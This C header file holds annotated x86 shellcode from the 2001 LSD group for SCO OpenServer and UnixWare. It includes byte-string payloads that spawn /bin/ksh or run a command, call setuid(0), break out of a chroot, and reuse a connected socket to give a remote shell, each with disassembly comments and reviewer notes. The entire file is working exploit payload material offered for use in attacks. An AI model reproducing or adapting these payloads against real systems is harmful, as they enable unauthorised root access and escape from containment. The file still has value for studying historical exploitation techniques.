/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland        *://lsd-pl.net/ #*/
/*## asmcodes for openserver 5.0.4 unixware 7.0 x86                          #*/

/*
syscall     %eax stack
----------- ---- ---------------------------------------------------------------
exec        x00b ret,->path="/bin/ksh",->[->a0=path,0]
exec        x00b ret,->path="/bin/ksh",->[->a0=path,->a1="-c",->a2=cmd,0]
setuid      x017 ret,uid=0
mkdir       x050 ret,->path="b..",mode=(any value is accepted)
chroot      x03d ret,->path={"b..","."}
chdir       x00c ret,->path=".."
ioctl       x036 ret,sfd,TI_GETPEERNAME=0x5491,->[mlen=0x91,len=0x91,->sadr=[]]
close       x006 ret,fd={0,1,2}
dup         x029 ret,sfd
*/

#if defined(X86) && ( defined(OPENSERVER) || defined(UNIXWARE) )

/* Stand-alone exec("/bin/ksh") variant.  Unlike shellcode[] below it does
 * not rely on a syscall stub in %esi: it writes its own far call
 * (opcode 0x9a, selector 0x07) over its own bytes at <shellcode+2> and
 * then calls into them, so the array must sit in memory that is both
 * writable and executable.  Offsets in the per-line comments are relative
 * to the start of the array; "33+8" does not count the trailing NUL the
 * compiler appends.                                                    */
char _shellcode[]=         /* 33+8 bytes                     */
    "\xeb\x1a"             /* jmp     <shellcode+28>         */
    "\x33\xd2"             /* xorl    %edx,%edx              */
    "\x58"                 /* popl    %eax                   */
    "\x8d\x78\x14"         /* leal    0x14(%eax),%edi        */
    "\x57"                 /* pushl   %edi                   */
    "\x50"                 /* pushl   %eax                   */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x92"                 /* xchgl   %eax,%edx              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x88\x42\x08"         /* movb    %al,0x8(%edx)          */
    "\x83\xef\x3b"         /* subl    $0x3b,%edi             */
    "\xb0\x9a"             /* movb    $0x9a,%al              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x47"                 /* incl    %edi                   */
    "\xb0\x07"             /* movb    $0x07,%al              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xe8\xe1\xff\xff\xff" /* call    <shellcode+2>          */
    "/bin/ksh"
;

/* Syscall stub shared by every snippet below that does `call *%esi`.
 * At run time the 0xff filler around 0x9a/0x07 is zeroed (stosl, stosb),
 * turning the tail into `lcall $0x7,$0x0; ret` -- the far-call system
 * call gate -- and %esi is left pointing at it.  The 0xff bytes are
 * presumably there only to keep NUL bytes out of the C string (TODO
 * confirm); like _shellcode[] this is self-modifying.                  */
char syscallcode[]=        /* 26 bytes                       */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\xeb\x09"             /* jmp     <syscallcode+13>       */
    "\x5f"                 /* popl    %edi                   */
    "\x57"                 /* pushl   %edi                   */
    "\x47"                 /* incl    %edi                   */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x47"                 /* incl    %edi                   */
    "\xaa"                 /* stosb   %al,%es:(%edi)         */
    "\x5e"                 /* popl    %esi                   */
    "\xeb\x0d"             /* jmp     <syscallcode+26>       */
    "\xe8\xf2\xff\xff\xff" /* call    <syscallcode+4>        */
    "\x9a\xff\xff\xff\xff" /* lcall   $0x7,$0x0 once patched */
    "\x07\xff"             /* (selector 0x0007, filler)      */
    "\xc3"                 /* ret                            */
;

/* exec("/bin/ksh") through the stub in %esi (syscall 0x0b, see table at
 * the top).  argv is assembled 0x14 bytes past the string; the string is
 * NUL-terminated at run time by the movb at +13.  "25+8" excludes the
 * compiler's trailing NUL.                                             */
char shellcode[]=          /* 25+8 bytes                     */
    "\xeb\x12"             /* jmp     <shellcode+20>         */
    "\x33\xd2"             /* xorl    %edx,%edx              */
    "\x58"                 /* popl    %eax                   */
    "\x8d\x78\x14"         /* leal    0x14(%eax),%edi        */
    "\x57"                 /* pushl   %edi                   */
    "\x50"                 /* pushl   %eax                   */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x92"                 /* xchgl   %eax,%edx              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x88\x42\x08"         /* movb    %al,0x8(%edx)          */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\xe8\xe9\xff\xff\xff" /* call    <shellcode+2>          */
    "/bin/ksh"
;

/* exec("/bin/ksh", "-c", cmd) through the stub in %esi.  The two movb
 * at +10/+13 split "/bin/ksh -c " into "/bin/ksh" and "-c" in place; the
 * command text is expected to follow the string (the "command" marker),
 * presumably appended by the caller -- TODO confirm.  argv is built
 * below the string rather than after it, presumably because the command
 * length is not known here.  NOTE(review): the original listing read the
 * third instruction as -0x44, but the encoded byte 0xac is -0x54.       */
char cmdshellcode[]=       /* 36+12+cmdlen bytes             */
    "\xeb\x1d"             /* jmp     <cmdshellcode+31>      */
    "\x33\xd2"             /* xorl    %edx,%edx              */
    "\x58"                 /* popl    %eax                   */
    "\x8d\x78\xac"         /* leal    -0x54(%eax),%edi       */
    "\x57"                 /* pushl   %edi                   */
    "\x50"                 /* pushl   %eax                   */
    "\x88\x50\x08"         /* movb    %dl,0x8(%eax)          */
    "\x88\x50\x0b"         /* movb    %dl,0xb(%eax)          */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x8d\x40\x09"         /* leal    0x09(%eax),%eax        */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x8d\x40\x03"         /* leal    0x03(%eax),%eax        */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x92"                 /* xchgl   %eax,%edx              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\xe8\xde\xff\xff\xff" /* call    <cmdshellcode+2>       */
    "/bin/ksh -c "
    /* command */
;

/* setuid(0) via the stub in %esi (syscall 0x17 per the table above).
 * Must be preceded by syscallcode[] so that %esi is valid.             */
char setuidcode[]=         /* 7 bytes                        */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\xb0\x17"             /* movb    $0x17,%al              */
    "\xff\xd6"             /* call    *%esi                  */
;

/* mkdir("b..") / chroot("b..") / chdir("..") x 0xff / chroot(".") through
 * the stub in %esi, matching the table at the top of the file.  The path
 * "b..." is pushed as an immediate and truncated to "b.." by the movb at
 * +9.  The loop at +32 targets +28 (the movb), not the pushl at +27, so
 * the same pushed pointer is reused for every chdir -- presumably relying
 * on the syscall gate not popping its arguments (TODO confirm).        */
char chrootcode[]=         /* 40 bytes                       */
    "\x68""b..."           /* pushl   $0x2e2e2e62            */
    "\x89\xe7"             /* movl    %esp,%edi              */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\x88\x47\x03"         /* movb    %al,0x3(%edi)          */
    "\x57"                 /* pushl   %edi                   */
    "\xb0\x50"             /* movb    $0x50,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x57"                 /* pushl   %edi                   */
    "\xb0\x3d"             /* movb    $0x3d,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x47"                 /* incl    %edi                   */
    "\x33\xc9"             /* xorl    %ecx,%ecx              */
    "\xb1\xff"             /* movb    $0xff,%cl              */
    "\x57"                 /* pushl   %edi                   */
    "\xb0\x0c"             /* movb    $0x0c,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\xe2\xfa"             /* loop    <chrootcode+28>        */
    "\x47"                 /* incl    %edi                   */
    "\x57"                 /* pushl   %edi                   */
    "\xb0\x3d"             /* movb    $0x3d,%al              */
    "\xff\xd6"             /* call    *%esi                  */
;

#if defined(UNIXWARE)
/* UnixWare only (see the #if above; no OpenServer variant is provided
 * here).  Walks descriptors downward issuing ioctl(TI_GETPEERNAME=0x5491)
 * and compares the peer port at sadr+2 with the 0x1234 placeholder in
 * `movw $0x1234,%bx`; FINDSCKPORTOFS (39) is the offset of that imm16,
 * which the caller overwrites.  On a match it close()s and dup()s the
 * descriptor onto 0,1,2 via the stub in %esi.  All branch targets in the
 * comments were checked against the encoded displacements.             */
char findsckcode[]=        /* 67 bytes                       */
    "\x56"                 /* pushl   %esi                   */
    "\x5f"                 /* popl    %edi                   */
    "\x83\xef\x7c"         /* subl    $0x7c,%edi             */
    "\x57"                 /* pushl   %edi                   */
    "\x8d\x4f\x10"         /* leal    0x10(%edi),%ecx        */
    "\xb0\x91"             /* movb    $0x91,%al              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x91"                 /* xchgl   %ecx,%eax              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x95"                 /* xchgl   %eax,%ebp              */
    "\xb5\x54"             /* movb    $0x54,%ch              */
    "\x51"                 /* pushl   %ecx                   */
    "\x66\xb9\x01\x01"     /* movw    $0x0101,%cx            */
    "\x51"                 /* pushl   %ecx                   */
    "\x33\xc0"             /* xorl    %eax,%eax              */
    "\xb0\x36"             /* movb    $0x36,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x59"                 /* popl    %ecx                   */
    "\x33\xdb"             /* xorl    %ebx,%ebx              */
    "\x3b\xc3"             /* cmpl    %ebx,%eax              */
    "\x75\x0a"             /* jne     <findsckcode+47>       */
    "\x66\xbb\x12\x34"     /* movw    $0x1234,%bx            */
    "\x66\x39\x5d\x02"     /* cmpw    %bx,0x2(%ebp)          */
    "\x74\x02"             /* je      <findsckcode+49>       */
    "\xe2\xe6"             /* loop    <findsckcode+23>       */
    "\x8b\xd9"             /* movl    %ecx,%ebx              */
    "\xb1\x03"             /* movb    $0x03,%cl              */
    "\x49"                 /* decl    %ecx                   */
    "\x51"                 /* pushl   %ecx                   */
    "\xb0\x06"             /* movb    $0x06,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x53"                 /* pushl   %ebx                   */
    "\xb0\x29"             /* movb    $0x29,%al              */
    "\xff\xd6"             /* call    *%esi                  */
    "\x41"                 /* incl    %ecx                   */
    "\xe2\xf2"             /* loop    <findsckcode+53>       */
;
#endif

/* Two-instruction gadget: copies %esp into %eax and returns.  Length is
 * 3 bytes plus the compiler's trailing NUL.                            */
char jump[]=
    "\x8b\xc4"             /* movl    %esp,%eax              */
    "\xc3"                 /* ret                            */
;

/* FINDSCKPORTOFS: byte offset within findsckcode[] of the 0x1234 port
 * placeholder (the imm16 of `movw $0x1234,%bx` at +37..+40), overwritten
 * by the caller.  BINDSCKPORTOFS names a bindsckcode[] that is not defined
 * in this file -- presumably provided elsewhere (TODO confirm); note the
 * value is written in octal (05 == 5).  SCO is a feature flag, presumably
 * tested by the code that includes this file.                          */
#define FINDSCKPORTOFS     39
#define BINDSCKPORTOFS     05
#define SCO

#endif
